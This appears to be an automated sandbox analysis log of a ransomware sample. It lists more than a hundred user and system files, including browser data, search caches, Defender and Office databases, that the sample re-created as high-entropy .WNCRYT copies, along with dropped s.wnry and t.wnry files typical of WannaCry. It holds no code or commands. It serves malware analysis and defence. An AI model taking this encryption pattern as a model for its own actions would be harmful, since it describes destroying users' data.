Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRYT entropy: 7.9997040124	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons\256.png.WNCRYT entropy: 7.99245214144	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409703539336388.txt.WNCRYT entropy: 7.99840439814	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpcache-E40F86FA01C77D7D9BB0598F680933D3AB85396F.bin.DB.WNCRYT entropy: 7.99989192587	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409704901523875.txt.WNCRYT entropy: 7.99844723469	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\A2C4612B-C11F-4E4C-8240-7294F3668696\en-us.16\stream.x86.en-us.db.WNCRYT entropy: 7.9995755228	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409705198455190.txt.WNCRYT entropy: 7.998600263	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\ClickToRun\ProductReleases\A2C4612B-C11F-4E4C-8240-7294F3668696\x-none.16\stream.x86.x-none.db.WNCRYT entropy: 7.99989182936	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409705498789017.txt.WNCRYT entropy: 7.99850147178	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409706362564741.txt.WNCRYT entropy: 7.9983748959	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Temp\jones.bmp.WNCRYT entropy: 7.99966906383	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409706552534938.txt.WNCRYT entropy: 7.99833760614	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Temp\user.bmp.WNCRYT entropy: 7.99973154957	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409706620146268.txt.WNCRYT entropy: 7.99841076986	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db.WNCRYT entropy: 7.99235798676	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409706852088195.txt.WNCRYT entropy: 7.99846585935	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\ConnectedDevicesPlatform\L.user\ActivitiesCache.db.WNCRYT entropy: 7.99983870201	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409708018850913.txt.WNCRYT entropy: 7.99847568897	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRYT entropy: 7.99639884363	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409708318751933.txt.WNCRYT entropy: 7.99860767752	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT entropy: 7.99343999919	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409708745795147.txt.WNCRYT entropy: 7.99843143582	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664184897943762.txt.WNCRYT entropy: 7.9984927715	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officec2rclient.exe.db.WNCRYT entropy: 7.99272444413	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664185202193242.txt.WNCRYT entropy: 7.99846531581	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officeclicktorun.exe.db.WNCRYT entropy: 7.9926329475	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\appsconversions.txt.WNCRYT entropy: 7.9998923764	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Office\OTele\officesetup.exe.db.WNCRYT entropy: 7.99362700149	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\appsglobals.txt.WNCRYT entropy: 7.99941949843	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\appssynonyms.txt.WNCRYT entropy: 7.99929259074	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.3.db.WNCRYT entropy: 7.99006205374	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\settingsglobals.txt.WNCRYT entropy: 7.9961803825	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db.WNCRYT entropy: 7.99984871629	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1bd4368b-5a81-4340-bb70-c47e715ef59b}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99496134561	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db.WNCRYT entropy: 7.99994382155	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a88a3c12-5895-49c0-aebb-958acaa71fed}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99483055468	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db.WNCRYT entropy: 7.99989904675	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d3eb7398-595c-4598-92b2-c8e082ebc5c4}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99492033993	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db.WNCRYT entropy: 7.99982909523	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\settingsconversions.txt.WNCRYT entropy: 7.99962887231	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db.WNCRYT entropy: 7.99688780056	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\settingssynonyms.txt.WNCRYT entropy: 7.99846569771	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_16.db.WNCRYT entropy: 7.99983356198	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{69143257-42f5-46b5-8baf-30774e2e792c}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99920940341	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db.WNCRYT entropy: 7.99979610017	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d7420b01-ee72-478b-af4f-6b44c9dc7707}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99916175554	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db.WNCRYT entropy: 7.99984028844	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_48.db.WNCRYT entropy: 7.99982880447	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db.WNCRYT entropy: 7.99995972124	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db.WNCRYT entropy: 7.99695000034	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.WNCRYT entropy: 7.99986256737	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Temp\18e190413af045db88dfbd29609eb877.db.WNCRYT entropy: 7.99205411173	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\eventpage_bin_prod.js.WNCRYT entropy: 7.99800105401	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRYT entropy: 7.9934688865	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_driver.js.WNCRYT entropy: 7.9998877703	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\product_page.js.WNCRYT entropy: 7.99980949928	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shopping.js.WNCRYT entropy: 7.99996600996	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\shoppingfre.js.WNCRYT entropy: 7.99943099563	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOqiqEgQ2[1].js.WNCRYT entropy: 7.99481570328	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\5451C91R\microsoft-365-logo-01d5ecd01a[1].png.WNCRYT entropy: 7.99133087553	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\5JD14XPQ\pwa-bootstrap-5e7af218e953d095fabf[1].js.WNCRYT entropy: 7.9970792307	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\edge_driver.js.WNCRYT entropy: 7.99990728554	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\5JD14XPQ\staticpwascripts-30998bff8f[1].js.WNCRYT entropy: 7.99049288266	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.WNCRYT entropy: 7.99139453579	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\HXWKPVWZ\otel-logger-104bffe9378b8041455c[1].js.WNCRYT entropy: 7.99801077257	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\auto_open_controller.js.WNCRYT entropy: 7.99988072528	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_checkout_page_validator.js.WNCRYT entropy: 7.99981141382	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\P24NZ9IW\pwa-bundle-3a99f64809c6780df035[1].js.WNCRYT entropy: 7.99985958526	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_confirmation_page_validator.js.WNCRYT entropy: 7.99982802091	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\P24NZ9IW\pwa-mru.2ce72562ad7c0ae7059c.chunk.v7[1].js.WNCRYT entropy: 7.9957320793	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js.WNCRYT entropy: 7.99757404444	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\P24NZ9IW\pwa-vendor-bundle-ba2888a24179bf152f3d[1].js.WNCRYT entropy: 7.99974148719	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\-U2ww19iycr3M_DiD25JdVUDdqk.br[1].js.WNCRYT entropy: 7.9979749682	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\584482RVjBIoEvVSe0RsuS1I4YQ.br[1].js.WNCRYT entropy: 7.99606844557	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\58urCM4ERwTmgZF8atjxpMnY4I4.br[1].js.WNCRYT entropy: 7.99950456979	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\5NTP7FNT\7\5fBhIWX2NfxoiM-aOLeKJczoLSY.br[1].js.WNCRYT entropy: 7.99927983862	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\shopping_iframe_driver.js.WNCRYT entropy: 7.99324064585	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRYT entropy: 7.9973389896	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\vendor.bundle.js.WNCRYT entropy: 7.9998598405	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\wallet.bundle.js.WNCRYT entropy: 7.99993578771	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\bnpl\bnpl.bundle.js.WNCRYT entropy: 7.99976664872	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\Mini-Wallet\miniwallet.bundle.js.WNCRYT entropy: 7.9994662137	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\oneDs_f2e0f4a029670f10d892[1].js.WNCRYT entropy: 7.9991296051	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\1VJI1O8Q\th[1].svg.WNCRYT entropy: 7.9935002224	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\9AG3H7PO\th[1].png.WNCRYT entropy: 7.99117650418	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\9AG3H7PO\th[2].png.WNCRYT entropy: 7.99090485459	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\M1FDD3EN\th[1].png.WNCRYT entropy: 7.99099021821	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\M1PE9Y29\th[1].png.WNCRYT entropy: 7.99245768797	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\M1PE9Y29\th[1].svg.WNCRYT entropy: 7.99415568527	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\INetCache\M1PE9Y29\th[2].png.WNCRYT entropy: 7.99217347272	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\CacheStorage\CacheStorage.edb.WNCRYT entropy: 7.99987961695	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRYT entropy: 7.99961931077	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AppData\Indexed DB\IndexedDB.edb.WNCRYT entropy: 7.99991781494	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\GLEAM-DARK.svg.WNCRYT entropy: 7.99444957743	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\s.wnry entropy: 7.998263053	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Desktop\t.wnry entropy: 7.99727613788	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664185510902646.txt.WNCRYT entropy: 7.99833490946	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{67e6418b-1ac4-40f2-b8e8-9239c2e7a1ab}\0.0.filtertrie.intermediate.txt.WNCRYT entropy: 7.99448816077	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664185800176358.txt.WNCRYT entropy: 7.99852420098	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Diagnosis\EventStore.db.WNCRYT entropy: 7.9982191542	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db.WNCRYT entropy: 7.99985862946	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\guest.bmp.WNCRYT entropy: 7.99968472751	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\User Account Pictures\user.bmp.WNCRYT entropy: 7.99971567493	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRYT entropy: 7.99959620519	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\ProgramData\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRYT entropy: 7.9948575216	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt.WNCRYT entropy: 7.9927548529	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRYT entropy: 7.99748474994	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT entropy: 7.99972982378	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\HXWKPVWZ\hero-image-desktop-f6720a4145[1].jpg.WNCRYT entropy: 7.99818369826	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409699892906782.txt.WNCRYT entropy: 7.99832452335	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409699906926699.txt.WNCRYT entropy: 7.99814209376	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409700426789434.txt.WNCRYT entropy: 7.99837744758	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409700490540470.txt.WNCRYT entropy: 7.99807327065	Jump to dropped file
